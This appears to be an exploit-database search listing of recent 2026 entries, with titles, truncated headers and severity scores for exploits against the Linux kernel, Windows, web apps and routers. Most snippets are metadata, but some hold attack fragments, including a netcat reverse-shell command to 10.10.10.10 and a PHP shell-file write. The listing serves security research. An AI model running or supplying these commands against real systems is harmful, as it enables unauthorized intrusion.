Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2026/05/26 12:0 a.m.170 views

Linux Kernel 6.8 - Local Privilege Escalation

Exploit Title: Linux Kernel 5.4 - 6.8 - Local Privilege Escalation Google Dork: N/A Date: 2026-04-30 Exploit Author: Long Fong Chan https://github.com/iss4cf0ng Vendor Homepage: https://www.kernel.org/ Software Link: https://git.kernel.org/ Version: Linux Kernel 5.4 - 6.8 unpatched Tested on:...

7.8CVSS7.3AI score0.96267EPSS
Exploits230
Exploit DB
Exploit DB
added 2026/05/26 12:0 a.m.94 views

Apache HTTP Server 2.4.66 - 'mod_http2' Double-Free Denial of Service

Exploit Title: Apache HTTP Server 2.4.66 - 'modhttp2' Double-Free Denial of Service Google Dork: intext:"Apache/2.4.66" "HTTP/2" Date: 2026-05-06 Exploit Author: xeloxa https://github.com/xeloxa/ Vendor Homepage: https://httpd.apache.org/ Software Link:...

8.8CVSS7.5AI score0.4581EPSS
Exploits16
Exploit DB
Exploit DB
added 2026/05/26 12:0 a.m.93 views

Grav CMS 2.0.0-beta.2 - Remote Code Execution

Exploit Title: Grav CMS 'onPluginsInitialized', 0; public function onPluginsInitialized: void $shellpath = GRAVROOT . '/shell.php'; if !fileexists$shellpath fileputcontents$shellpath, '';...

9.1CVSS5.8AI score0.03934EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/05/26 12:0 a.m.107 views

Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover

Exploit Title: Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover Date: 2026-05-02 Exploit Author: Amir Hossein Jamshidi Vendor Homepage: https://wordpress.org Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip Versio...

9.8CVSS5.8AI score0.09246EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/05/26 12:0 a.m.74 views

D-Link DSL2600U - 'rom-0' Admin Password Disclosure

Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure Date: 2026-05-02 Exploit Author: Amir Hossein Jamshidi Vendor Homepage: https://www.dlink.com Version: DSL-2600U Tested on: ubuntu CVE : N/A Firmware Version: v1.08 from routersploit.libs.lzs.lzs import LZSDecompress import reques...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/21 12:0 a.m.82 views

solaredge - (CSRF-OOB-Injection)

Titles: solaredge - CSRF-OOB-Injection Author: nu11secur1tyAI Date: 2026-04-26 Vendor: SolarEdge Technologies Ltd. Software: SolarEdge Monitoring Platform - Framework /solaredge-web/ Reference: https://monitoring.solaredge.com/ Description: The solaredge-CSRF-Hijack vulnerability arises due to a...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/21 12:0 a.m.93 views

FUXA 1.2.9 - RCE

Exploit Title: FUXA 1.2.9 - RCE Date: 4/24/2026 Exploit Author: Anthony Cihan Hann1bl3L3ct3r Vendor Homepage: https://github.com/frangoteam/FUXA Version: Arbitrary File Write - RCE Affected: FUXA makes Node's path.resolve climb out of appDir to anywhere the FUXA process can write. fullPath/fileNa...

9.8CVSS5.8AI score0.02675EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/05/21 12:0 a.m.92 views

Lenovo LegionSpace 1.7.11.2 - 'DAService' Unquoted Service Path

Exploit Title: Lenovo LegionSpace 1.7.11.2 - 'DAService' Unquoted Service Path Exploit Author: CENACIF-MX Discovery Date: 2025-12-04 Vendor Homepage: https://support.lenovo.com/es/es/solutions/legionspace Tested Version: 1.7.11.2 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/21 12:0 a.m.130 views

Cockpit 359 - RCE

Exploit Title: Cockpit 359 - RCE Date: 18-04-2026 Exploit Author: @intx0x80 Vendor Homepage: https://cockpit-project.org/ Software Link: https://github.com/cockpit-project/cockpit Version: 327-359 Tested on: Debain CVE : CVE-2026-4631 import base64 import argparse import requests import urllib3...

9.8CVSS5.8AI score0.142EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/05/21 12:0 a.m.92 views

BookStack 25.12.1 - Denial of Service

Exploit Title: BookStack 25.12.1 - Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https://www.bookstackapp.com Software Link: https://github.com/BookStackApp/BookStack Version: 2 else None searchurl =...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/15 12:0 a.m.83 views

Remote Sunrise Helper for Windows 2026.14 - Remote Code Execution

Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated Remote Code Execution Date: 2026-04-20 Exploit Author: Chokri Hammedi Software: https://rs.ltd/latest.php?os=win Vendor: https://rs.ltd/ Version: 2026.14 Tested on: Windows 10 / Windows 11 !/usr/bin/env python3 import...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/15 12:0 a.m.92 views

Windows Snipping Tool - NTLMv2 Hash Hijack

Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack Date: 2026-04-22 Exploit Author: nu11secur1ty Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398 Vendor Homepage: https://www.microsoft.com Software Link: Built-in Windows Snipping Tool Version: Windows 10, Windows 11,...

4.3CVSS5.8AI score0.03447EPSS
Exploits5
Exploit DB
Exploit DB
added 2026/05/15 12:0 a.m.71 views

Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing

!/usr/bin/env python3 Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing Date: 2026-04-20 Exploit Author: Chokri Hammedi Software: https://rs.ltd/latest.php?os=win Vendor: https://rs.ltd/ Version: 2026.14 Tested on: Windows 10 / Windows 11 import...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/14 12:0 a.m.72 views

Apache HertzBeat 1.8.0 - Remote Code Execution

Exploit Title: Apache HertzBeat 1.8.0 - Remote Code Execution Google Dork: N/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https://hertzbeat.apache.org/ Software Link: https://github.com/apache/hertzbeat/releases Version: 1.8.0 Tested on: Linux Docker; official HertzBeat...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/14 12:0 a.m.74 views

WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI

Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI Date: 3/30/2026 Exploit Author: bootstrapbool Vendor Homepage: https://supsystic.com/plugins/contact-form-plugin/ Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ Version: str: try: res = requests.geturl...

9.8CVSS5.8AI score0.41475EPSS
Exploits8
Exploit DB
Exploit DB
added 2026/05/14 12:0 a.m.75 views

PJPROJECT 2.16 - Heap Bufferoverflow

Exploit Title: PJPROJECT 2.16 - Heap Bufferoverflow Google Dork: CVE-2026-25994 PJSIP PJNATH pjsip ≤ 2.16 Date: Apr 6 2026 Exploit Author: V.Nos - BinSmaser Team Vendor Homepage: https://github.com/pjsip/pjproject Software Link: https://github.com/VABISMO/cve-2026-25994PJSIP Version: rxufrag; -...

9.8CVSS7.3AI score0.01927EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/05/14 12:0 a.m.69 views

ePati Antikor NGFW 2.0.1301 - Authentication Bypass

Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass Date: 2026-04-13 Exploit Author: SADIK ERTÜRK Vendor Homepage: https://www.epati.com.tr/ Software Link: https://www.epati.com.tr/antikor-ngfw/ Version: v.2.0.1298 - v.2.0.1301 Tested on: Linux / Antikor OS CVE: CVE-2026-2624 impor...

9.8CVSS5.8AI score0.02194EPSS
Exploits2
Exploit DB
Exploit DB
added 2026/05/13 12:0 a.m.102 views

coreruleset 4.21.0 - Firewall Bypass

Exploit Title: coreruleset 4.21.0 - Firewall Bypass Date: 04/08/2026 Exploit Author: Daytrift Newgen Vendor Homepage: https://github.com/coreruleset Software Link: https://github.com/coreruleset/coreruleset Version: 4.22.0/3.3.8 Tested on: Fedora, MacOS CVE : CVE-2026-21876 import base64 import o...

9.3CVSS6AI score0.13124EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/05/13 12:0 a.m.83 views

glances 4.5.2 - command injection

!/usr/bin/env python3 Exploit Title: glances 4.5.2 - command injection Date: 2026-04-09 Exploit Author: Stepanov Daniil Vendor Homepage: https://github.com/nicolargo/glances Software Link: https://github.com/nicolargo/glances Version: 4.5.2 and below fixed in 4.5.3 Tested on: Kali Linux 2026.1,...

7.8CVSS5.8AI score0.00866EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/05/13 12:0 a.m.106 views

Ninja Forms Uploads - Unauthenticated PHP File Upload

Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload Date: 2026-04-09 Exploit Author: Sélim Lanouar @whattheslime Vendor Homepage: https://ninjaforms.com/ Software Link: https://ninjaforms.com/extensions/file-uploads/ Version: 3.3.24 Tested on: WordPress 6.9.3 on Apache and Nginx...

9.8CVSS7.3AI score0.54254EPSS
Exploits7
Exploit DB
Exploit DB
added 2026/05/13 12:0 a.m.103 views

Flowise < 3.0.5 - Missing Authentication for Critical Function

Exploit Title: Flowise 3.0.5 - Missing Authentication for Critical Function Date: 10/11/2025 Exploit Author: nltt0 https://github.com/nltt-br Vendor Homepage: https://flowiseai.com/ Software Link: https://github.com/FlowiseAI/Flowise Version: 3.0.5 CVE: CVE-2025-58434 from requests import post fr...

9.8CVSS6AI score0.50118EPSS
Exploits14
Exploit DB
Exploit DB
added 2026/05/07 12:0 a.m.75 views

Bludit CMS 3.18.4 - RCE

Exploit Title: Bludit CMS 3.18.4 - RCE Date: 2026-03-28 Exploit Author: Yahia Hamza https://yh.do Vendor Homepage: https://www.bludit.com/ Software Link: https://github.com/bludit/bludit/archive/refs/tags/3.18.2.zip Version: Bludit . The uploadFile function performs no file extension or content...

8.8CVSS5.8AI score0.01919EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/05/07 12:0 a.m.89 views

telnetd 2.7 - Buffer Overflow

Exploit Title: telnetd 2.7 - Buffer Overflow Google Dork: N/A Date: 2026-04-03 Exploit Author: Jeff Barron jeffaf Vendor Homepage: https://www.gnu.org/software/inetutils/ Software Link: https://ftp.gnu.org/gnu/inetutils/ Version: inetutils-telnetd through 2.7 patch pending in next release Tested...

9.8CVSS7.5AI score0.23674EPSS
Exploits8
Exploit DB
Exploit DB
added 2026/05/07 12:0 a.m.78 views

Ghost CMS 6.19.0 - SQLi

Exploit Title: Ghost CMS 6.19.0 - SQLi Date: 2026-03-30 Exploit Author: Maksim Rogov Exploit Licence: GPL-3.0 Software Link: https://ghost.org/ Version: Ghost =3D 3.24.0, = 3.24.0, = 6.19.0 Tested on: Ghost 6.16.1 CVE : CVE-2026-26980 !/usr/bin/env python3 import requests import re import sys...

9.4CVSS6AI score0.69996EPSS
Exploits7
Exploit DB
Exploit DB
added 2026/05/07 12:0 a.m.75 views

NocoBase 2.0.27 - VM Sandbox Escape

Exploit Title: NocoBase 2.0.27 - VM Sandbox Escape Date: 2026-03-26 Exploit Author: Onurcan Genç Vendor Homepage: https://www.nocobase.com/ Software Link: https://github.com/nocobase/nocobase Version: -u -P --cmd "id"...

9.9CVSS6AI score0.36503EPSS
Exploits7
Exploit DB
Exploit DB
added 2026/05/07 12:0 a.m.76 views

LuaJIT 2.1.1774638290 - Arbitrary Code Execution

-- Exploit Title: LuaJIT 2.1.1774638290 - Arbitrary Code Execution -- Date: 2026-03-29 -- Exploit Author: TaurusOmar -- Vendor Homepage: https://luajit.org/ -- Software Link: https://luajit.org/download.html -- Version: LuaJIT 2.1.1774638290 latest -- Tested on: Linux x86-64 Arch Linux --...

5.8AI score
Exploits0
Exploit DB
Exploit DB
added 2026/05/07 12:0 a.m.87 views

ThingsBoard IoT Platform 4.2.0 - Server-Side Request Forgery (SSRF)

Exploit Title: ThingsBoard IoT Platform 4.2.0 - Server-Side Request Forgery SSRF Date: 2026-03-25 Exploit Author: Tamil Mathi T. Vendor Homepage: https://thingsboard.io Software Link: https://github.com/thingsboard/thingsboard Version: . When ThingsBoard processes the uploaded SVG server-side, it...

9.1CVSS5.8AI score0.01658EPSS
Exploits2
Exploit DB
Exploit DB
added 2026/05/04 12:0 a.m.86 views

MindsDB 25.9.1.1 - Path Traversal

Exploit Title: MindsDB 25.9.1.1 - Path Traversal Date: 06-03-2026 Exploit Author: Lohitya Pushkar thewhiteh4t Vendor Homepage: https://mindsdb.com/ Software Link: https://github.com/mindsdb/mindsdb Version: not installed handlers BANNER = """ ------------------------------------- --- CVE-2026-274...

8.8CVSS5.8AI score0.11113EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/05/04 12:0 a.m.75 views

Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)

Exploit Title: Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow RCE Date: 2026-15-03 Exploit Author: JarrettgxzSec Vendor Homepage: www.linksys.com Version: FW " printf"! Example: python3 sys.argv0 192.168.1.100 192.168.1.1\n" sys.exit1 TARGETIP = sys.argv2 TARGETPORT = 80 ATTACKERIP =...

8.8CVSS5.8AI score0.03906EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/05/04 12:0 a.m.103 views

Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)

Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking CSWSH Date: 2026-02-26 Exploit Author: Hazar Taspinar Vendor Homepage: https://www.traccar.org/ Software Link: https://github.com/traccar/traccar Version: = 6.11.1 Tested on: Windows 11 / Linux CVE: CVE-2025-68930...

7.1CVSS5.8AI score0.00541EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/05/04 12:0 a.m.98 views

Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation

Exploit Title: Linux Kernel procreaddirde 6.18-rc5 - Local Privilege Escalation CVE: CVE-2025-40271 Date: 2026-03-19 Exploit Author: Aviral Srivastava Vendor: Linux Kernel kernel.org Affected: 3.14+ through 6.18-rc5 bug predates version tracking Fixed in stable: 5.10.247, 6.1.159, 6.12.73, 6.18-r...

7.8CVSS7AI score0.12966EPSS
Exploits9
Exploit DB
Exploit DB
added 2026/05/04 12:0 a.m.93 views

Windows 11 24H2 - Local Privilege Escalation

Exploit Title: Windows 11 24H2 - Local Privilege Escalation Google Dork: inurl:http.sys "Windows 11 24H2" vulnerability | intitle:"HTTP.sys" "CVE-2026-21250" "Elevation of Privilege" Date: 2026-02-27 Exploit Author: London foggy snow Vendor Homepage: https://www.microsoft.com/en-us/msrc Software...

7.8CVSS5.8AI score0.0104EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/05/04 12:0 a.m.144 views

Linux nf_tables 6.19.3 - Local Privilege Escalation

Exploit Title: Linux Kernel 3.16 – 6.19.3 nftables RCU UAF LPE CVE: CVE-2026-23231 Date: 2026-03-19 Exploit Author: Aviral Srivastava Vendor: Linux Kernel kernel.org Affected: 3.16 – 6.19.3 Fixed in: 6.1.165, 6.6.128, 6.12.75, 6.18.14, 6.19.4 commit 71e99ee20fc3f662555118cf1159443250647533 Tested...

7.8CVSS7AI score0.28058EPSS
Exploits22
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.76 views

HUSTOJ Zip-Slip v26.01.24 - RCE

Exploit Title: HUSTOJ Zip-Slip v26.01.24 - RCE Date: 2026-02-14 Exploit Author: Marshall Whittaker / oxagast Vendor Homepage: https://github.com/zhblue/hustoj Software Link: http://123.158.38.129:8090/livecd/HUSTOJ25.05.iso LiveCD, or see above git repo Version: Before v26.01.24 Tested on: Ubuntu...

9.8CVSS5.2AI score0.07895EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.83 views

BusyBox 1.37.0 - Path Traversal

Exploit Title: BusyBox 1.37.0 - Path Traversal Google Dork: N/A Date: 2026-02-11 Exploit Author: Calil Khalil Vendor Homepage: https://busybox.net Software Link: https://busybox.net/downloads/ Version: BusyBox 1.36.1, 1.37.0 Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19 CVE: CVE-2026-26157 """...

7CVSS7.2AI score0.00682EPSS
Exploits2
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.94 views

FUXA 1.2.8 - Authentication Bypass + RCE Exploit

Exploit Title: FUXA 1.2.8 - Authentication Bypass + RCE Exploit Date: 2026-02-25 Exploit Author: Joshua van der Poll https://github.com/joshuavanderpoll/ Software Link: https://github.com/frangoteam/FUXA/tree/v1.2.8 Vendor Homepage: https://github.com/frangoteam/FUXA Version: FUXA 1.2.8. Do not u...

9.8CVSS5.2AI score0.05633EPSS
Exploits7
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.67 views

JUNG Smart Visu Server 1.1.1050 - Dos

Exploit Title: JUNG Smart Visu Server 1.1.1050- Dos CVE: CVE-2026-26235 Date: 2026-02-12 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Author GitHub: https://github.com/banyamer-security Vendor Homepage: https://www.jung.de Software Link:...

8.7CVSS5.2AI score0.01784EPSS
Exploits5
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.73 views

Frigate NVR 0.16.3 - Remote Code Execution

Exploit Title: Frigate NVR 0.16.3 - Remote Code Execution Date: 2026-02-05 Exploit Author: jduardo2704 Vendor Homepage: https://frigate.video/ Software Link: https://github.com/blakeblackshear/frigate Version: = 0.16.3 Tested on: Linux / Docker CVE: CVE-2026-25643 Advisory:...

9.1CVSS5.2AI score0.02874EPSS
Exploits8
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.79 views

Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection

Exploit Title: Cybersecurity AI CAI Framework 0.5.10 - Command Injection CVE: CVE-2026-25130 Date: 2026-02-03 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Author GitHub: https://github.com/yourusername Vendor Homepage:...

9.6CVSS5.2AI score0.008EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.72 views

NiceGUI 3.6.1 - Path Traversal

Exploit Title: NiceGUI 3.6.1 - Path Traversal Author: Mohammed Idrees Banyamer Instagram: @banyamersecurity GitHub: https://github.com/mbanyamer Date: 2025-06-06 Tested on: NiceGUI = 3.6.1 Python 3.8–3.12 on Linux/Windows CVE: CVE-2026-25732 Affected Versions: = 3.6.1 fixed in 3.7.0 Type: Remote...

7.5CVSS5.2AI score0.03212EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.86 views

Windows 11 25H2 - Heap Overflow

Exploit Title: Windows 11 25H2 - Heap Overflow Ghost Patch Exploit Framework Date: 2026-02-13 Exploit Author: nu11secur1ty Vendor Homepage: https://www.microsoft.com Software Link: https://www.microsoft.com/software-download/windows11 Version: Windows 11 25H2 Build 26200.7830 Vulnerable Tested on...

7.3CVSS5.2AI score0.01243EPSS
Exploits1
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.74 views

Erugo 0.2.14 - Remote Code Execution (RCE)

Exploit Title: Erugo = 0.2.14 - Authenticated Remote Code Execution RCE Date: 2026-02-02 Exploit Author: Abdul Moiz Vendor Homepage: https://github.com/ErugoOSS/Erugo Software Link:...

10CVSS5.2AI score0.03008EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.77 views

deephas 1.0.7 - Prototype Pollution

Exploit Title: deephas 1.0.7 - Prototype Pollution Google Dork: N/A Date: 2026-02-01 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamersecurity Vendor Homepage: https://www.npmjs.com/package/deephas Software Link: https://github.com/sharpred/deepHas Version: =...

9.4CVSS5.2AI score0.00717EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.120 views

Camaleon CMS v2.9.0 - Path Traversal

Exploit Title: Camaleon CMS v2.9.0 - Path Traversal Date: 2026-02-02 Exploit Author: Sakshi Velampudi CyberQuestor Vendor Homepage: https://github.com/owen2345/camaleon-cms Software Link: https://github.com/owen2345/camaleon-cms/releases/tag/2.9.0 Version: = 2.9.0 Tested on: Linux CVE:...

7.7CVSS5.2AI score0.1456EPSS
Exploits11
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.83 views

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

5.3CVSS6.6AI score0.04548EPSS
Exploits22
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.102 views

SUSE Manager 4.3.15 - Code Execution

Exploit Title: SUSE Manager 4.3.15 - Code Execution Date: 29.01.2026 Exploit Author: Wiktor Maj Vendor Homepage: https://www.uyuni-project.org/ Software Link: https://github.com/uyuni-project/uyuni Version: Uyuni 2025.05, SUSE Manager 5.0.4, SUSE Manager 4.3.15 Tested on: Debian 12 bookworm, Pyth...

9.8CVSS5.5AI score0.10353EPSS
Exploits1
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.67 views

SumatraPDF 3.5.2 - Remote Code Execution

Exploit Title: SumatraPDF 3.5.2 - Remote Code Execution Date: 2026-02-10 Exploit Author: Mohammed I. Banyamer Vendor Homepage: https://www.sumatrapdfreader.org/ Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer Version: 3.5.0 - 3.5.2 Tested on: Windows 10 / 11 CVE :...

7.5CVSS5.2AI score0.00445EPSS
Exploits4
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.77 views

Python-Multipart 0.0.22 - Path Traversal

Exploit Title: Python-Multipart 0.0.22 - Path Traversal Date: 2026-02-23 Exploit Author: cardosource Vendor Homepage: https://github.com/Kludex/python-multipart Software Link: https://pypi.org/project/python-multipart/ Version: 0.0.22 REQUIRED Tested on: Ubuntu / Python 3.13.5 / Docker as root fo...

8.6CVSS6.6AI score0.02228EPSS
Exploits5
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.72 views

Repetier-Server 1.4.10 - Path Traversal

Exploit Title: Repetier-Server 1.4.10 - Path Traversal Exploit Author: Mohammed Idrees Banyamer Vendor Homepage: https://www.repetier.com/ Version: str: return "..%5c" depth def attemptreadtargeturl: str, filepath: str, traversaldepth: int = 15, timeout: int = 10 - bool: traversal =...

9.8CVSS5.2AI score0.02806EPSS
Exploits3
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.102 views

Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap

Exploit Title: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap Date: 2026-02-23 Exploit Author: nu11secur1ty Vendor Homepage: https://www.google.com/chrome/ Software Link: https://www.google.com/chrome/ Version: Chrome = 144.x | Chrome 145.0.7632.75 Tested on: Windows 11 / Linux / macOS CVE...

8.8CVSS5.8AI score0.2202EPSS
Exploits12
Total number of security vulnerabilities47904